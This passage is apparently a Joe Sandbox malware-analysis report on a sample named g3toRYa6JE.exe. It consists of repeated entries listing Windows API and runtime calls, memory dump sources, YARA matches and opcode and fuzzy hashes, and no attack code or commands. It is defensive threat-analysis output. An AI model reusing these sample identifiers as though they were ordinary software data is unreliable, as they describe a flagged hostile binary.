                                                                                                                                                                                                                              • API String ID: 2506810119-1804425573
                                                                                                                                                                                                                              • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                              • Instruction ID: 9cabfb70e7d1101f7aa6931033736f2f7250cd8eb994997f94c6a7917a9720ec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7631B371B00228AFDB21DF9AAC8089FBBFCEF95314B90407BE80597211D7749E45CB99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\g3toRYa6JE.exe,00000104), ref: 007AF9AA
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007AFA75
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007AFA7F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\g3toRYa6JE.exe
                                                                                                                                                                                                                              • API String ID: 2506810119-1804425573
                                                                                                                                                                                                                              • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                              • Instruction ID: e3ae0d9126d36a2856bcece693d777ed59783b91a5e5567381a2541a2c5fc868
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E4314D71A00258EFDB21DFD99C8599EBBBCEFCB710B108276E80897211D6789A41CB95
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
                                                                                                                                                                                                                              • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 0042DFCA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                              • String ID: <(@
                                                                                                                                                                                                                              • API String ID: 3213686812-4189137628
                                                                                                                                                                                                                              • Opcode ID: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
                                                                                                                                                                                                                              • Instruction ID: c42ad4fc6a3a459dd0b6f73910b388841d309234efd3d08c580d18ad64b54486
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CCF02761B8432635FA2037B27D0BBAB19150F14B0DF96003FFF0A995C3DEAC955040AD
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
                                                                                                                                                                                                                              • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 0042DFCA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                              • String ID: <(@
                                                                                                                                                                                                                              • API String ID: 3213686812-4189137628
                                                                                                                                                                                                                              • Opcode ID: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
                                                                                                                                                                                                                              • Instruction ID: 8d9534a8efac39963163d02413269ee71f33911fb9a211fcd458cde81c8fda17
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08F0A061B8431635FA203BA1BD0BB9619254F14B09F56002BBE0AA95D2DAA9955041AD
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242E9
                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004242FB
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00424309
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                              • String ID: pScheduler
                                                                                                                                                                                                                              • API String ID: 1381464787-923244539
                                                                                                                                                                                                                              • Opcode ID: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
                                                                                                                                                                                                                              • Instruction ID: 0ab47ed57e3114165a5b8518f1ff4cdc14a790a58e52e99d458785ee7c9320ad
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7F0A731B01224A7CB18FB56E852D9E73A99E40304791826FF806A3182DFBCA948C65D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E62F
                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E642
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E650
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                              • String ID: pContext
                                                                                                                                                                                                                              • API String ID: 1990795212-2046700901
                                                                                                                                                                                                                              • Opcode ID: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                                                                                                                                                                                              • Instruction ID: 74844cc6af7f8c94541e855de6513edd01ccc4ed259e70f51b8aa0ea99782ad2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9EE06139B0011427CB04FB65DC06C5DB7A8AEC0714390413BF905A3381DFB8AD0585CC
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DAA
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DB8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                              • String ID: pScheduler$version
                                                                                                                                                                                                                              • API String ID: 1687795959-3154422776
                                                                                                                                                                                                                              • Opcode ID: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
                                                                                                                                                                                                                              • Instruction ID: 78896325b6b5d70010e1ee9e49f38da00e370817edf74f3b448257e365f7b275
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99E08630900608F6CB14EE56D80EBDD77A45B51749F61C1277819610929BBC96C8CB4E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                                                                              • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                              • Instruction ID: bca4f3389f7aef3b321b47e138c454c1308b116cb1c02f017d73c82a305e3271
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65A14872A00B869FEB15DE18C8917AEFBE1EF19310F28426FD5859B381C23C9D41C759
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                                                                              • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                              • Instruction ID: 03d1a81e62e6eff6f6ebf8aa4402053bad978d002cb7ea79eef54d21da10abc9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5A16B72A00B869FDB25CF18C895BEEBFE5EF52310F18426DE5959B282D23C8D41CB50
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                              • Instruction ID: f2494f1ef04ef44517cd1171a85dede66e5513e309315ffa42068036143921cc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57410771E00210ABDB257BBADC42AAF7664EF5E374F14127FF41882391D73C590946A9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                              • Instruction ID: 134278f961736dd6e76c5bf49640379f4a236b72363d293ee39ffd07a16a0dc1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63411A31B00504EBDB256FB89C6DBEE3BA4EF46B70F144735F418D7292E63C894056A1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,007B046A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 007B6B41
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007B6BCA
                                                                                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 007B6BDC
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 007B6BE5
                                                                                                                                                                                                                                • Part of subcall function 007B38FE: RtlAllocateHeap.NTDLL(00000000,0078DACD,00000000), ref: 007B3930
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2652629310-0
                                                                                                                                                                                                                              • Opcode ID: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
                                                                                                                                                                                                                              • Instruction ID: 4a46c5d68cec0c165c36f16b19aa34dab85d2602b4151d07ee5355e941d12cd8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F317CB2A0020AABDF259F64DC45EEF7BB5EB40710B244269FD04D7190EB39DD50CB90
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 531285432-0
                                                                                                                                                                                                                              • Opcode ID: 9c244af1b80992c8c5c11ff33a9a240242c4a027173cbb81dbc6de2572cd5d43
                                                                                                                                                                                                                              • Instruction ID: d103751f5e86bb577f21b0ef41fc0747bac1fbbf4bb65c452d8b20089be38efe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c244af1b80992c8c5c11ff33a9a240242c4a027173cbb81dbc6de2572cd5d43
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7217C75E0021A9FDF00EFA5CC829AEB7B8EF09714F10007AF901B7291D778AD058BA5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 531285432-0
                                                                                                                                                                                                                              • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                              • Instruction ID: 0eeba18371cd0c3176f66c6bf0695ecab83f3bea83c55e3ca377d3e2df7f9820
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E214FB5A40119AFDF10FFA4DC86DBEBBB8EF09750F100069F905A7291D778AD019BA1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,00000000), ref: 00423729
                                                                                                                                                                                                                              • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423711
                                                                                                                                                                                                                                • Part of subcall function 0041B71C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B73D
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0042375A
                                                                                                                                                                                                                              • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423783
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2630251706-0
                                                                                                                                                                                                                              • Opcode ID: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
                                                                                                                                                                                                                              • Instruction ID: fbbc1a7e5a16338d661a11365c58371bffdd4c48ac4c368ddaba424d9e7313e5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5911E9747002146BCF04AF659C85DAEB765EB84761B144067FA059B392CBAC9D41C698
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ShowWindow.USER32(00000005), ref: 00401FA5
                                                                                                                                                                                                                              • UpdateWindow.USER32 ref: 00401FAD
                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00401FC1
                                                                                                                                                                                                                              • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 00402024
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$Show$MoveUpdate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1339878773-0
                                                                                                                                                                                                                              • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                              • Instruction ID: 53ee9dd5e88c5c6849e3e7895ae91ae42f7fd804de43801a61d80981d891571f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90016531E006109BC7258F19ED04A267BA7FFD5712B15803AF40C972B1D7B1AC428B9C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 004290D3
                                                                                                                                                                                                                                • Part of subcall function 00429020: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042904F
                                                                                                                                                                                                                                • Part of subcall function 00429020: ___AdjustPointer.LIBCMT ref: 0042906A
                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 004290E8
                                                                                                                                                                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 004290F9
                                                                                                                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 00429121
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 737400349-0
                                                                                                                                                                                                                              • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                              • Instruction ID: 9a28eba3c49a40873050ba514f30250a61a7a586528b59ff06f814ea835fedb3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55014032200159BBDF116E96EC41EEB7F7AEF48758F444009FE4896121C73AEC61DBA8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 007A933A
                                                                                                                                                                                                                                • Part of subcall function 007A9287: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 007A92B6
                                                                                                                                                                                                                                • Part of subcall function 007A9287: ___AdjustPointer.LIBCMT ref: 007A92D1
                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 007A934F
                                                                                                                                                                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 007A9360
                                                                                                                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 007A9388
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 737400349-0
                                                                                                                                                                                                                              • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                              • Instruction ID: d5ec440c3f6ed725c298ef86517848e069b9fabde7d5153fbb11eb471f3946f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD011772100148BBCF126E95CC45EEB7B79EFDA755F054204FE08A6121C33AE871DBA0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue), ref: 00434F51
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431F9C), ref: 00434F5D
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F6B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                                                              • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                              • Instruction ID: 0dde809cff85efe1a06f082dffa05588a2f4c4b6f5b2494ffdd5bda6add1d188
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3401FC36615322AFC7214F69AC449A77B98AF89FA1F241531F905D7240D724E90186E8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,007B512D,00000000,00000000,00000000,00000000,?,007B53E5,00000006,0044A378), ref: 007B51B8
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,007B512D,00000000,00000000,00000000,00000000,?,007B53E5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,007B2203), ref: 007B51C4
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007B512D,00000000,00000000,00000000,00000000,?,007B53E5,00000006,0044A378,0044A370,0044A378,00000000), ref: 007B51D2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                                                              • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                              • Instruction ID: 219d73f39983593a8993735ba3ef5355a7fd3680ca54d04c1b0a3308cb2c933b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C01A736611B2EABC7218F6D9C44B967798AF56FA2B210630FA06D7181D734D901CAE4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426138
                                                                                                                                                                                                                              • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042614C
                                                                                                                                                                                                                              • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426164
                                                                                                                                                                                                                              • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042617C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
